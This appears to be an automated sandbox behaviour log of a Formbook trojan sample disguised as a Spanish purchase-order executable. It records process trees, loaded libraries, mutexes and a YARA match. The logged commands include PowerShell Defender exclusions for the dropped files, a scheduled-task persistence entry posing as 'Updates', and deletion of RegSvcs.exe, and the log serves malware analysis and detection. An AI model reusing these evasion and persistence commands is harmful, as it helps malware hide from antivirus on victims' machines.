          Source: Process Memory Space: rundll32.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Orden de compra 0307AR24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: RggSaCWUvAyNK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, JvN7hpwJnm4gTu1HXw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, JvN7hpwJnm4gTu1HXw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@814/15@11/6
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile created: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMutant created: NULL
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMutant created: \Sessions\1\BaseNamedObjects\EBvxQgpPCyASqqgsyudJCdIq
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile created: C:\Users\user\AppData\Local\Temp\tmp362B.tmpJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeCommand line argument: SystemTray_Main14_2_002113B0
          Source: Orden de compra 0307AR24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Orden de compra 0307AR24.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: Orden de compra 0307AR24.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile read: C:\Users\user\Desktop\Orden de compra 0307AR24.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Orden de compra 0307AR24.exe "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeAutomated click: OK
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
